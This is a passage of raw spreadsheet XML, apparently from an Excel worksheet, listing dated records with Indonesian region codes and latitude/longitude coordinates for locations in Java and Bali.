      <c r="E2823" t="s">
        <v>23</v>
      </c>
      <c r="G2823" t="s">
        <v>9564</v>
      </c>
      <c r="H2823" t="s">
        <v>26</v>
      </c>
      <c r="J2823" t="s">
        <v>1519</v>
      </c>
      <c r="L2823" t="s">
        <v>9565</v>
      </c>
      <c r="M2823">
        <v>3175010003</v>
      </c>
      <c r="N2823">
        <v>3175010</v>
      </c>
      <c r="O2823">
        <v>3175</v>
      </c>
      <c r="P2823">
        <v>31</v>
      </c>
      <c r="Q2823" t="s">
        <v>545</v>
      </c>
      <c r="R2823" t="s">
        <v>546</v>
      </c>
      <c r="S2823" t="s">
        <v>547</v>
      </c>
      <c r="T2823" t="s">
        <v>33</v>
      </c>
      <c r="U2823" s="5">
        <v>10677651</v>
      </c>
      <c r="V2823" s="5" t="s">
        <v>16988</v>
      </c>
      <c r="W2823" s="5">
        <v>-614070</v>
      </c>
      <c r="X2823" t="s">
        <v>20726</v>
      </c>
      <c r="Y2823" t="str">
        <f t="shared" si="44"/>
        <v>-6.14070,106.77651</v>
      </c>
    </row>
    <row r="2824" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2824">
        <v>230161</v>
      </c>
      <c r="B2824" s="1">
        <v>44230</v>
      </c>
      <c r="C2824" s="2">
        <v>4.9999999999999996E-2</v>
      </c>
      <c r="D2824" t="s">
        <v>2648</v>
      </c>
      <c r="E2824" t="s">
        <v>23</v>
      </c>
      <c r="G2824" t="s">
        <v>9566</v>
      </c>
      <c r="H2824" t="s">
        <v>26</v>
      </c>
      <c r="J2824" t="s">
        <v>2036</v>
      </c>
      <c r="L2824" t="s">
        <v>9567</v>
      </c>
      <c r="M2824">
        <v>3173070001</v>
      </c>
      <c r="N2824">
        <v>3173070</v>
      </c>
      <c r="O2824">
        <v>3173</v>
      </c>
      <c r="P2824">
        <v>31</v>
      </c>
      <c r="Q2824" t="s">
        <v>322</v>
      </c>
      <c r="R2824" t="s">
        <v>323</v>
      </c>
      <c r="S2824" t="s">
        <v>62</v>
      </c>
      <c r="T2824" t="s">
        <v>33</v>
      </c>
      <c r="U2824" s="5">
        <v>10683394</v>
      </c>
      <c r="V2824" s="5" t="s">
        <v>16989</v>
      </c>
      <c r="W2824" s="5">
        <v>-615885</v>
      </c>
      <c r="X2824" t="s">
        <v>20727</v>
      </c>
      <c r="Y2824" t="str">
        <f t="shared" si="44"/>
        <v>-6.15885,106.83394</v>
      </c>
    </row>
    <row r="2825" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2825">
        <v>230197</v>
      </c>
      <c r="B2825" s="1">
        <v>44230</v>
      </c>
      <c r="C2825" s="2">
        <v>8.819444444444445E-2</v>
      </c>
      <c r="D2825" t="s">
        <v>2648</v>
      </c>
      <c r="E2825" t="s">
        <v>23</v>
      </c>
      <c r="G2825" t="s">
        <v>9568</v>
      </c>
      <c r="H2825" t="s">
        <v>26</v>
      </c>
      <c r="J2825" t="s">
        <v>9569</v>
      </c>
      <c r="L2825" t="s">
        <v>9570</v>
      </c>
      <c r="M2825">
        <v>3175040003</v>
      </c>
      <c r="N2825">
        <v>3175040</v>
      </c>
      <c r="O2825">
        <v>3175</v>
      </c>
      <c r="P2825">
        <v>31</v>
      </c>
      <c r="Q2825" t="s">
        <v>2062</v>
      </c>
      <c r="R2825" t="s">
        <v>2063</v>
      </c>
      <c r="S2825" t="s">
        <v>547</v>
      </c>
      <c r="T2825" t="s">
        <v>33</v>
      </c>
      <c r="U2825" s="5">
        <v>10691067</v>
      </c>
      <c r="V2825" s="5" t="s">
        <v>16990</v>
      </c>
      <c r="W2825" s="5">
        <v>-611951</v>
      </c>
      <c r="X2825" t="s">
        <v>20728</v>
      </c>
      <c r="Y2825" t="str">
        <f t="shared" si="44"/>
        <v>-6.11951,106.91067</v>
      </c>
    </row>
    <row r="2826" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2826">
        <v>230287</v>
      </c>
      <c r="B2826" s="1">
        <v>44230</v>
      </c>
      <c r="C2826" s="2">
        <v>0.16597222222222222</v>
      </c>
      <c r="D2826" t="s">
        <v>2648</v>
      </c>
      <c r="E2826" t="s">
        <v>23</v>
      </c>
      <c r="G2826" t="s">
        <v>9571</v>
      </c>
      <c r="H2826" t="s">
        <v>26</v>
      </c>
      <c r="J2826" t="s">
        <v>2438</v>
      </c>
      <c r="L2826" t="s">
        <v>9572</v>
      </c>
      <c r="M2826">
        <v>3175050003</v>
      </c>
      <c r="N2826">
        <v>3175050</v>
      </c>
      <c r="O2826">
        <v>3175</v>
      </c>
      <c r="P2826">
        <v>31</v>
      </c>
      <c r="Q2826" t="s">
        <v>1740</v>
      </c>
      <c r="R2826" t="s">
        <v>1013</v>
      </c>
      <c r="S2826" t="s">
        <v>547</v>
      </c>
      <c r="T2826" t="s">
        <v>33</v>
      </c>
      <c r="U2826" s="5">
        <v>10691250</v>
      </c>
      <c r="V2826" s="5" t="s">
        <v>16991</v>
      </c>
      <c r="W2826" s="5">
        <v>-614840</v>
      </c>
      <c r="X2826" t="s">
        <v>20729</v>
      </c>
      <c r="Y2826" t="str">
        <f t="shared" si="44"/>
        <v>-6.14840,106.91250</v>
      </c>
    </row>
    <row r="2827" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2827">
        <v>230343</v>
      </c>
      <c r="B2827" s="1">
        <v>44230</v>
      </c>
      <c r="C2827" s="2">
        <v>0.20347222222222219</v>
      </c>
      <c r="D2827" t="s">
        <v>2648</v>
      </c>
      <c r="E2827" t="s">
        <v>23</v>
      </c>
      <c r="G2827" t="s">
        <v>9573</v>
      </c>
      <c r="H2827" t="s">
        <v>26</v>
      </c>
      <c r="J2827" t="s">
        <v>2627</v>
      </c>
      <c r="L2827" t="s">
        <v>9574</v>
      </c>
      <c r="M2827">
        <v>3216070018</v>
      </c>
      <c r="N2827">
        <v>3216070</v>
      </c>
      <c r="O2827">
        <v>3216</v>
      </c>
      <c r="P2827">
        <v>32</v>
      </c>
      <c r="Q2827" t="s">
        <v>9575</v>
      </c>
      <c r="R2827" t="s">
        <v>5479</v>
      </c>
      <c r="S2827" t="s">
        <v>41</v>
      </c>
      <c r="T2827" t="s">
        <v>42</v>
      </c>
      <c r="U2827" s="5">
        <v>10708923</v>
      </c>
      <c r="V2827" s="5" t="s">
        <v>16992</v>
      </c>
      <c r="W2827" s="5">
        <v>-618463</v>
      </c>
      <c r="X2827" t="s">
        <v>20730</v>
      </c>
      <c r="Y2827" t="str">
        <f t="shared" si="44"/>
        <v>-6.18463,107.08923</v>
      </c>
    </row>
    <row r="2828" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2828">
        <v>230448</v>
      </c>
      <c r="B2828" s="1">
        <v>44230</v>
      </c>
      <c r="C2828" s="2">
        <v>0.26787037037037037</v>
      </c>
      <c r="D2828" t="s">
        <v>85</v>
      </c>
      <c r="E2828" t="s">
        <v>23</v>
      </c>
      <c r="F2828" t="s">
        <v>9576</v>
      </c>
      <c r="G2828" t="s">
        <v>9577</v>
      </c>
      <c r="H2828" t="s">
        <v>26</v>
      </c>
      <c r="J2828" t="s">
        <v>2627</v>
      </c>
      <c r="K2828" t="s">
        <v>9578</v>
      </c>
      <c r="L2828" t="s">
        <v>9579</v>
      </c>
      <c r="M2828">
        <v>3216041008</v>
      </c>
      <c r="N2828">
        <v>3216041</v>
      </c>
      <c r="O2828">
        <v>3216</v>
      </c>
      <c r="P2828">
        <v>32</v>
      </c>
      <c r="Q2828" t="s">
        <v>9580</v>
      </c>
      <c r="R2828" t="s">
        <v>9581</v>
      </c>
      <c r="S2828" t="s">
        <v>41</v>
      </c>
      <c r="T2828" t="s">
        <v>42</v>
      </c>
      <c r="U2828" s="5">
        <v>10718606</v>
      </c>
      <c r="V2828" s="5" t="s">
        <v>16993</v>
      </c>
      <c r="W2828" s="5">
        <v>-627097</v>
      </c>
      <c r="X2828" t="s">
        <v>20731</v>
      </c>
      <c r="Y2828" t="str">
        <f t="shared" si="44"/>
        <v>-6.27097,107.18606</v>
      </c>
    </row>
    <row r="2829" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2829">
        <v>230611</v>
      </c>
      <c r="B2829" s="1">
        <v>44230</v>
      </c>
      <c r="C2829" s="2">
        <v>0.41431712962962958</v>
      </c>
      <c r="D2829" t="s">
        <v>22</v>
      </c>
      <c r="E2829" t="s">
        <v>23</v>
      </c>
      <c r="F2829" t="s">
        <v>9582</v>
      </c>
      <c r="H2829" t="s">
        <v>7978</v>
      </c>
      <c r="I2829" t="s">
        <v>7983</v>
      </c>
      <c r="J2829" t="s">
        <v>7277</v>
      </c>
      <c r="L2829" t="s">
        <v>9583</v>
      </c>
      <c r="M2829">
        <v>5103010001</v>
      </c>
      <c r="N2829">
        <v>5103010</v>
      </c>
      <c r="O2829">
        <v>5103</v>
      </c>
      <c r="P2829">
        <v>51</v>
      </c>
      <c r="Q2829" t="s">
        <v>9584</v>
      </c>
      <c r="R2829" t="s">
        <v>9585</v>
      </c>
      <c r="S2829" t="s">
        <v>7281</v>
      </c>
      <c r="T2829" t="s">
        <v>7282</v>
      </c>
      <c r="U2829" s="5">
        <v>11512386</v>
      </c>
      <c r="V2829" s="5" t="s">
        <v>16994</v>
      </c>
      <c r="W2829" s="5">
        <v>-880346</v>
      </c>
      <c r="X2829" t="s">
        <v>20732</v>
      </c>
      <c r="Y2829" t="str">
        <f t="shared" si="44"/>
        <v>-8.80346,115.12386</v>
      </c>
    </row>
    <row r="2830" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2830">
        <v>230697</v>
      </c>
      <c r="B2830" s="1">
        <v>44230</v>
      </c>
      <c r="C2830" s="2">
        <v>0.48290509259259262</v>
      </c>
      <c r="D2830" t="s">
        <v>22</v>
      </c>
      <c r="E2830" t="s">
        <v>23</v>
      </c>
      <c r="F2830" t="s">
        <v>9586</v>
      </c>
      <c r="G2830" t="s">
        <v>9587</v>
      </c>
      <c r="H2830" t="s">
        <v>26</v>
      </c>
      <c r="I2830" t="s">
        <v>1538</v>
      </c>
      <c r="J2830" t="s">
        <v>2622</v>
      </c>
      <c r="L2830" t="s">
        <v>9588</v>
      </c>
      <c r="M2830">
        <v>3514130004</v>
      </c>
      <c r="N2830">
        <v>3514130</v>
      </c>
      <c r="O2830">
        <v>3514</v>
      </c>
      <c r="P2830">
        <v>35</v>
      </c>
      <c r="Q2830" t="s">
        <v>9589</v>
      </c>
      <c r="R2830" t="s">
        <v>8283</v>
      </c>
      <c r="S2830" t="s">
        <v>8284</v>
      </c>
      <c r="T2830" t="s">
        <v>1221</v>
      </c>
      <c r="U2830" s="5">
        <v>11268528</v>
      </c>
      <c r="V2830" s="5" t="s">
        <v>16995</v>
      </c>
      <c r="W2830" s="5">
        <v>-761739</v>
      </c>
      <c r="X2830" t="s">
        <v>20733</v>
      </c>
      <c r="Y2830" t="str">
        <f t="shared" si="44"/>
        <v>-7.61739,112.68528</v>
      </c>
    </row>
    <row r="2831" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2831">
        <v>231632</v>
      </c>
      <c r="B2831" s="1">
        <v>44231</v>
      </c>
      <c r="C2831" s="2">
        <v>0.26944444444444443</v>
      </c>
      <c r="D2831" t="s">
        <v>2648</v>
      </c>
      <c r="E2831" t="s">
        <v>23</v>
      </c>
      <c r="G2831" t="s">
        <v>9590</v>
      </c>
      <c r="H2831" t="s">
        <v>26</v>
      </c>
      <c r="J2831" t="s">
        <v>9591</v>
      </c>
      <c r="L2831" t="s">
        <v>9592</v>
      </c>
      <c r="M2831">
        <v>3175060005</v>
      </c>
      <c r="N2831">
        <v>3175060</v>
      </c>
      <c r="O2831">
        <v>3175</v>
      </c>
      <c r="P2831">
        <v>31</v>
      </c>
      <c r="Q2831" t="s">
        <v>5964</v>
      </c>
      <c r="R2831" t="s">
        <v>2279</v>
      </c>
      <c r="S2831" t="s">
        <v>547</v>
      </c>
      <c r="T2831" t="s">
        <v>33</v>
      </c>
      <c r="U2831" s="5">
        <v>10693260</v>
      </c>
      <c r="V2831" s="5" t="s">
        <v>16996</v>
      </c>
      <c r="W2831" s="5">
        <v>-612089</v>
      </c>
      <c r="X2831" t="s">
        <v>20734</v>
      </c>
      <c r="Y2831" t="str">
        <f t="shared" si="44"/>
        <v>-6.12089,106.93260</v>
      </c>
    </row>
    <row r="2832" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2832">
        <v>231657</v>
      </c>
      <c r="B2832" s="1">
        <v>44231</v>
      </c>
      <c r="C2832" s="2">
        <v>0.28643518518518518</v>
      </c>
      <c r="D2832" t="s">
        <v>22</v>
      </c>
      <c r="E2832" t="s">
        <v>23</v>
      </c>
      <c r="F2832" t="s">
        <v>9593</v>
      </c>
      <c r="G2832" t="s">
        <v>9594</v>
      </c>
      <c r="H2832" t="s">
        <v>26</v>
      </c>
      <c r="I2832" t="s">
        <v>383</v>
      </c>
      <c r="J2832" t="s">
        <v>2608</v>
      </c>
      <c r="L2832" t="s">
        <v>9595</v>
      </c>
      <c r="M2832">
        <v>3319010003</v>
      </c>
      <c r="N2832">
        <v>3319010</v>
      </c>
      <c r="O2832">
        <v>3319</v>
      </c>
      <c r="P2832">
        <v>33</v>
      </c>
      <c r="Q2832" t="s">
        <v>9596</v>
      </c>
      <c r="R2832" t="s">
        <v>9597</v>
      </c>
      <c r="S2832" t="s">
        <v>7152</v>
      </c>
      <c r="T2832" t="s">
        <v>1134</v>
      </c>
      <c r="U2832" s="5">
        <v>11078718</v>
      </c>
      <c r="V2832" s="5" t="s">
        <v>16997</v>
      </c>
      <c r="W2832" s="5">
        <v>-680378</v>
      </c>
      <c r="X2832" t="s">
        <v>20735</v>
      </c>
      <c r="Y2832" t="str">
        <f t="shared" si="44"/>
        <v>-6.80378,110.78718</v>
      </c>
    </row>
    <row r="2833" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2833">
        <v>231969</v>
      </c>
      <c r="B2833" s="1">
        <v>44231</v>
      </c>
      <c r="C2833" s="2">
        <v>0.56155092592592593</v>
      </c>
      <c r="D2833" t="s">
        <v>22</v>
      </c>
      <c r="E2833" t="s">
        <v>23</v>
      </c>
      <c r="F2833" t="s">
        <v>9598</v>
      </c>
      <c r="G2833" t="s">
        <v>9599</v>
      </c>
      <c r="H2833" t="s">
        <v>26</v>
      </c>
      <c r="I2833" t="s">
        <v>137</v>
      </c>
      <c r="J2833" t="s">
        <v>2622</v>
      </c>
      <c r="L2833" t="s">
        <v>9600</v>
      </c>
      <c r="M2833">
        <v>3505080005</v>
      </c>
      <c r="N2833">
        <v>3505080</v>
      </c>
      <c r="O2833">
        <v>3505</v>
      </c>
      <c r="P2833">
        <v>35</v>
      </c>
      <c r="Q2833" t="s">
        <v>9601</v>
      </c>
      <c r="R2833" t="s">
        <v>9601</v>
      </c>
      <c r="S2833" t="s">
        <v>9602</v>
      </c>
      <c r="T2833" t="s">
        <v>1221</v>
      </c>
      <c r="U2833" s="5">
        <v>11221573</v>
      </c>
      <c r="V2833" s="5" t="s">
        <v>16998</v>
      </c>
      <c r="W2833" s="5">
        <v>-812755</v>
      </c>
      <c r="X2833" t="s">
        <v>20736</v>
      </c>
      <c r="Y2833" t="str">
        <f t="shared" si="44"/>
        <v>-8.12755,112.21573</v>
      </c>
    </row>
    <row r="2834" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2834">
        <v>232034</v>
      </c>
      <c r="B2834" s="1">
        <v>44231</v>
      </c>
      <c r="C2834" s="2">
        <v>0.66855324074074074</v>
      </c>
      <c r="D2834" t="s">
        <v>22</v>
      </c>
      <c r="E2834" t="s">
        <v>23</v>
      </c>
      <c r="F2834" t="s">
        <v>9603</v>
      </c>
      <c r="G2834" t="s">
        <v>9604</v>
      </c>
      <c r="H2834" t="s">
        <v>26</v>
      </c>
      <c r="I2834" t="s">
        <v>72</v>
      </c>
      <c r="J2834" t="s">
        <v>9605</v>
      </c>
      <c r="L2834" t="s">
        <v>9606</v>
      </c>
      <c r="M2834">
        <v>3374100007</v>
      </c>
      <c r="N2834">
        <v>3374100</v>
      </c>
      <c r="O2834">
        <v>3374</v>
      </c>
      <c r="P2834">
        <v>33</v>
      </c>
      <c r="Q2834" t="s">
        <v>9607</v>
      </c>
      <c r="R2834" t="s">
        <v>9608</v>
      </c>
      <c r="S2834" t="s">
        <v>1334</v>
      </c>
      <c r="T2834" t="s">
        <v>1134</v>
      </c>
      <c r="U2834" s="5">
        <v>11045195</v>
      </c>
      <c r="V2834" s="5" t="s">
        <v>16999</v>
      </c>
      <c r="W2834" s="5">
        <v>-695707</v>
      </c>
      <c r="X2834" t="s">
        <v>20737</v>
      </c>
      <c r="Y2834" t="str">
        <f t="shared" si="44"/>
        <v>-6.95707,110.45195</v>
      </c>
    </row>
    <row r="2835" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2835">
        <v>232117</v>
      </c>
      <c r="B2835" s="1">
        <v>44231</v>
      </c>
      <c r="C2835" s="2">
        <v>0.91445601851851854</v>
      </c>
      <c r="D2835" t="s">
        <v>22</v>
      </c>
      <c r="E2835" t="s">
        <v>23</v>
      </c>
      <c r="F2835" t="s">
        <v>9609</v>
      </c>
      <c r="G2835" t="s">
        <v>9610</v>
      </c>
      <c r="H2835" t="s">
        <v>26</v>
      </c>
      <c r="I2835" t="s">
        <v>137</v>
      </c>
      <c r="J2835" t="s">
        <v>3135</v>
      </c>
      <c r="L2835" t="s">
        <v>9611</v>
      </c>
      <c r="M2835">
        <v>3671010003</v>
      </c>
      <c r="N2835">
        <v>3671010</v>
      </c>
      <c r="O2835">
        <v>3671</v>
      </c>
      <c r="P2835">
        <v>36</v>
      </c>
      <c r="Q2835" t="s">
        <v>400</v>
      </c>
      <c r="R2835" t="s">
        <v>200</v>
      </c>
      <c r="S2835" t="s">
        <v>201</v>
      </c>
      <c r="T2835" t="s">
        <v>171</v>
      </c>
      <c r="U2835" s="5">
        <v>10670894</v>
      </c>
      <c r="V2835" s="5" t="s">
        <v>17000</v>
      </c>
      <c r="W2835" s="5">
        <v>-624874</v>
      </c>
      <c r="X2835" t="s">
        <v>20738</v>
      </c>
      <c r="Y2835" t="str">
        <f t="shared" si="44"/>
        <v>-6.24874,106.70894</v>
      </c>
    </row>
    <row r="2836" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2836">
        <v>232358</v>
      </c>
      <c r="B2836" s="1">
        <v>44232</v>
      </c>
      <c r="C2836" s="2">
        <v>0.74912037037037038</v>
      </c>
      <c r="D2836" t="s">
        <v>22</v>
      </c>
      <c r="E2836" t="s">
        <v>23</v>
      </c>
      <c r="F2836" t="s">
        <v>9612</v>
      </c>
      <c r="G2836" t="s">
        <v>9613</v>
      </c>
      <c r="H2836" t="s">
        <v>26</v>
      </c>
      <c r="I2836" t="s">
        <v>639</v>
      </c>
      <c r="J2836" t="s">
        <v>4142</v>
      </c>
      <c r="L2836" t="s">
        <v>9614</v>
      </c>
      <c r="M2836">
        <v>3171040004</v>
      </c>
      <c r="N2836">
        <v>3171040</v>
      </c>
      <c r="O2836">
        <v>3171</v>
      </c>
      <c r="P2836">
        <v>31</v>
      </c>
      <c r="Q2836" t="s">
        <v>4144</v>
      </c>
      <c r="R2836" t="s">
        <v>163</v>
      </c>
      <c r="S2836" t="s">
        <v>108</v>
      </c>
      <c r="T2836" t="s">
        <v>33</v>
      </c>
      <c r="U2836" s="5">
        <v>10675873</v>
      </c>
      <c r="V2836" s="5" t="s">
        <v>17001</v>
      </c>
      <c r="W2836" s="5">
        <v>-624066</v>
      </c>
      <c r="X2836" t="s">
        <v>20739</v>
      </c>
      <c r="Y2836" t="str">
        <f t="shared" si="44"/>
        <v>-6.24066,106.75873</v>
      </c>
    </row>
    <row r="2837" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2837">
        <v>232366</v>
      </c>
      <c r="B2837" s="1">
        <v>44232</v>
      </c>
      <c r="C2837" s="2">
        <v>0.8351736111111111</v>
      </c>
      <c r="D2837" t="s">
        <v>22</v>
      </c>
      <c r="E2837" t="s">
        <v>23</v>
      </c>
      <c r="F2837" t="s">
        <v>9615</v>
      </c>
      <c r="G2837" t="s">
        <v>9616</v>
      </c>
      <c r="H2837" t="s">
        <v>26</v>
      </c>
      <c r="I2837" t="s">
        <v>137</v>
      </c>
      <c r="J2837" t="s">
        <v>2627</v>
      </c>
      <c r="L2837" t="s">
        <v>9617</v>
      </c>
      <c r="M2837">
        <v>3275041004</v>
      </c>
      <c r="N2837">
        <v>3275041</v>
      </c>
      <c r="O2837">
        <v>3275</v>
      </c>
      <c r="P2837">
        <v>32</v>
      </c>
      <c r="Q2837" t="s">
        <v>133</v>
      </c>
      <c r="R2837" t="s">
        <v>134</v>
      </c>
      <c r="S2837" t="s">
        <v>41</v>
      </c>
      <c r="T2837" t="s">
        <v>42</v>
      </c>
      <c r="U2837" s="5">
        <v>10701151</v>
      </c>
      <c r="V2837" s="5" t="s">
        <v>17002</v>
      </c>
      <c r="W2837" s="5">
        <v>-626967</v>
      </c>
      <c r="X2837" t="s">
        <v>20740</v>
      </c>
      <c r="Y2837" t="str">
        <f t="shared" si="44"/>
        <v>-6.26967,107.01151</v>
      </c>
    </row>
    <row r="2838" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2838">
        <v>232367</v>
      </c>
      <c r="B2838" s="1">
        <v>44232</v>
      </c>
      <c r="C2838" s="2">
        <v>0.92555555555555558</v>
      </c>
      <c r="D2838" t="s">
        <v>22</v>
      </c>
      <c r="E2838" t="s">
        <v>23</v>
      </c>
      <c r="F2838" t="s">
        <v>9618</v>
      </c>
      <c r="H2838" t="s">
        <v>26</v>
      </c>
      <c r="I2838" t="s">
        <v>882</v>
      </c>
      <c r="J2838" t="s">
        <v>9619</v>
      </c>
      <c r="L2838" t="s">
        <v>9620</v>
      </c>
      <c r="M2838">
        <v>3374090002</v>
      </c>
      <c r="N2838">
        <v>3374090</v>
      </c>
      <c r="O2838">
        <v>3374</v>
      </c>
      <c r="P2838">
        <v>33</v>
      </c>
      <c r="Q2838" t="s">
        <v>1411</v>
      </c>
      <c r="R2838" t="s">
        <v>1362</v>
      </c>
      <c r="S2838" t="s">
        <v>1334</v>
      </c>
      <c r="T2838" t="s">
        <v>1134</v>
      </c>
      <c r="U2838" s="5">
        <v>11046663</v>
      </c>
      <c r="V2838" s="5" t="s">
        <v>17003</v>
      </c>
      <c r="W2838" s="5">
        <v>-696679</v>
      </c>
      <c r="X2838" t="s">
        <v>20741</v>
      </c>
      <c r="Y2838" t="str">
        <f t="shared" si="44"/>
        <v>-6.96679,110.46663</v>
      </c>
    </row>
    <row r="2839" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2839">
        <v>232368</v>
      </c>
      <c r="B2839" s="1">
        <v>44232</v>
      </c>
      <c r="C2839" s="2">
        <v>0.95087962962962969</v>
      </c>
      <c r="D2839" t="s">
        <v>22</v>
      </c>
      <c r="E2839" t="s">
        <v>23</v>
      </c>
      <c r="F2839" t="s">
        <v>9621</v>
      </c>
      <c r="G2839" t="s">
        <v>9622</v>
      </c>
      <c r="H2839" t="s">
        <v>26</v>
      </c>
      <c r="I2839" t="s">
        <v>1447</v>
      </c>
      <c r="J2839" t="s">
        <v>9623</v>
      </c>
      <c r="M2839">
        <v>3374110005</v>
      </c>
      <c r="N2839">
        <v>3374110</v>
      </c>
      <c r="O2839">
        <v>3374</v>
      </c>
      <c r="P2839">
        <v>33</v>
      </c>
      <c r="Q2839" t="s">
        <v>9624</v>
      </c>
      <c r="R2839" t="s">
        <v>9625</v>
      </c>
      <c r="S2839" t="s">
        <v>1334</v>
      </c>
      <c r="T2839" t="s">
        <v>1134</v>
      </c>
      <c r="U2839" s="5">
        <v>11043241</v>
      </c>
      <c r="V2839" s="5" t="s">
        <v>17004</v>
      </c>
      <c r="W2839" s="5">
        <v>-697545</v>
      </c>
      <c r="X2839" t="s">
        <v>20742</v>
      </c>
      <c r="Y2839" t="str">
        <f t="shared" si="44"/>
        <v>-6.97545,110.43241</v>
      </c>
    </row>
    <row r="2840" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2840">
        <v>232369</v>
      </c>
      <c r="B2840" s="1">
        <v>44232</v>
      </c>
      <c r="C2840" s="2">
        <v>0.99263888888888896</v>
      </c>
      <c r="D2840" t="s">
        <v>22</v>
      </c>
      <c r="E2840" t="s">
        <v>23</v>
      </c>
      <c r="F2840" s="3" t="s">
        <v>9626</v>
      </c>
      <c r="G2840" t="s">
        <v>9627</v>
      </c>
      <c r="H2840" t="s">
        <v>26</v>
      </c>
      <c r="I2840" t="s">
        <v>137</v>
      </c>
      <c r="J2840" t="s">
        <v>9628</v>
      </c>
      <c r="M2840">
        <v>3374080008</v>
      </c>
      <c r="N2840">
        <v>3374080</v>
      </c>
      <c r="O2840">
        <v>3374</v>
      </c>
      <c r="P2840">
        <v>33</v>
      </c>
      <c r="Q2840" t="s">
        <v>9629</v>
      </c>
      <c r="R2840" t="s">
        <v>2992</v>
      </c>
      <c r="S2840" t="s">
        <v>1334</v>
      </c>
      <c r="T2840" t="s">
        <v>1134</v>
      </c>
      <c r="U2840" s="5">
        <v>11046255</v>
      </c>
      <c r="V2840" s="5" t="s">
        <v>17005</v>
      </c>
      <c r="W2840" s="5">
        <v>-699979</v>
      </c>
      <c r="X2840" t="s">
        <v>20743</v>
      </c>
      <c r="Y2840" t="str">
        <f t="shared" si="44"/>
        <v>-6.99979,110.46255</v>
      </c>
    </row>
    <row r="2841" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2841">
        <v>232370</v>
      </c>
      <c r="B2841" s="1">
        <v>44232</v>
      </c>
      <c r="C2841" s="2">
        <v>0.99859953703703708</v>
      </c>
      <c r="D2841" t="s">
        <v>22</v>
      </c>
      <c r="E2841" t="s">
        <v>23</v>
      </c>
      <c r="F2841" t="s">
        <v>9630</v>
      </c>
      <c r="G2841" t="s">
        <v>9631</v>
      </c>
      <c r="H2841" t="s">
        <v>26</v>
      </c>
      <c r="I2841" t="s">
        <v>137</v>
      </c>
      <c r="J2841" t="s">
        <v>9632</v>
      </c>
      <c r="M2841">
        <v>3374130009</v>
      </c>
      <c r="N2841">
        <v>3374130</v>
      </c>
      <c r="O2841">
        <v>3374</v>
      </c>
      <c r="P2841">
        <v>33</v>
      </c>
      <c r="Q2841" t="s">
        <v>2975</v>
      </c>
      <c r="R2841" t="s">
        <v>9633</v>
      </c>
      <c r="S2841" t="s">
        <v>1334</v>
      </c>
      <c r="T2841" t="s">
        <v>1134</v>
      </c>
      <c r="U2841" s="5">
        <v>11042304</v>
      </c>
      <c r="V2841" s="5" t="s">
        <v>17006</v>
      </c>
      <c r="W2841" s="5">
        <v>-697456</v>
      </c>
      <c r="X2841" t="s">
        <v>20744</v>
      </c>
      <c r="Y2841" t="str">
        <f t="shared" si="44"/>
        <v>-6.97456,110.42304</v>
      </c>
    </row>
    <row r="2842" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2842">
        <v>232371</v>
      </c>
      <c r="B2842" s="1">
        <v>44233</v>
      </c>
      <c r="C2842" s="2">
        <v>7.2997685185185179E-2</v>
      </c>
      <c r="D2842" t="s">
        <v>22</v>
      </c>
      <c r="E2842" t="s">
        <v>23</v>
      </c>
      <c r="F2842" s="3" t="s">
        <v>9634</v>
      </c>
      <c r="G2842" t="s">
        <v>9635</v>
      </c>
      <c r="H2842" t="s">
        <v>26</v>
      </c>
      <c r="I2842" t="s">
        <v>628</v>
      </c>
      <c r="J2842" t="s">
        <v>2608</v>
      </c>
      <c r="L2842" t="s">
        <v>9636</v>
      </c>
      <c r="M2842">
        <v>3324090012</v>
      </c>
      <c r="N2842">
        <v>3324090</v>
      </c>
      <c r="O2842">
        <v>3324</v>
      </c>
      <c r="P2842">
        <v>33</v>
      </c>
      <c r="Q2842" t="s">
        <v>9637</v>
      </c>
      <c r="R2842" t="s">
        <v>9638</v>
      </c>
      <c r="S2842" t="s">
        <v>7074</v>
      </c>
      <c r="T2842" t="s">
        <v>1134</v>
      </c>
      <c r="U2842" s="5">
        <v>11023372</v>
      </c>
      <c r="V2842" s="5" t="s">
        <v>17007</v>
      </c>
      <c r="W2842" s="5">
        <v>-695132</v>
      </c>
      <c r="X2842" t="s">
        <v>20745</v>
      </c>
      <c r="Y2842" t="str">
        <f t="shared" si="44"/>
        <v>-6.95132,110.23372</v>
      </c>
    </row>
    <row r="2843" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2843">
        <v>232377</v>
      </c>
      <c r="B2843" s="1">
        <v>44233</v>
      </c>
      <c r="C2843" s="2">
        <v>8.8321759259259267E-2</v>
      </c>
      <c r="D2843" t="s">
        <v>22</v>
      </c>
      <c r="E2843" t="s">
        <v>23</v>
      </c>
      <c r="F2843" t="s">
        <v>9639</v>
      </c>
      <c r="G2843" t="s">
        <v>9640</v>
      </c>
      <c r="H2843" t="s">
        <v>7978</v>
      </c>
      <c r="I2843" t="s">
        <v>7979</v>
      </c>
      <c r="J2843" t="s">
        <v>9641</v>
      </c>
      <c r="M2843">
        <v>3374070006</v>
      </c>
      <c r="N2843">
        <v>3374070</v>
      </c>
      <c r="O2843">
        <v>3374</v>
      </c>
      <c r="P2843">
        <v>33</v>
      </c>
      <c r="Q2843" t="s">
        <v>9642</v>
      </c>
      <c r="R2843" t="s">
        <v>1333</v>
      </c>
      <c r="S2843" t="s">
        <v>1334</v>
      </c>
      <c r="T2843" t="s">
        <v>1134</v>
      </c>
      <c r="U2843" s="5">
        <v>11046896</v>
      </c>
      <c r="V2843" s="5" t="s">
        <v>17008</v>
      </c>
      <c r="W2843" s="5">
        <v>-705255</v>
      </c>
      <c r="X2843" t="s">
        <v>20746</v>
      </c>
      <c r="Y2843" t="str">
        <f t="shared" si="44"/>
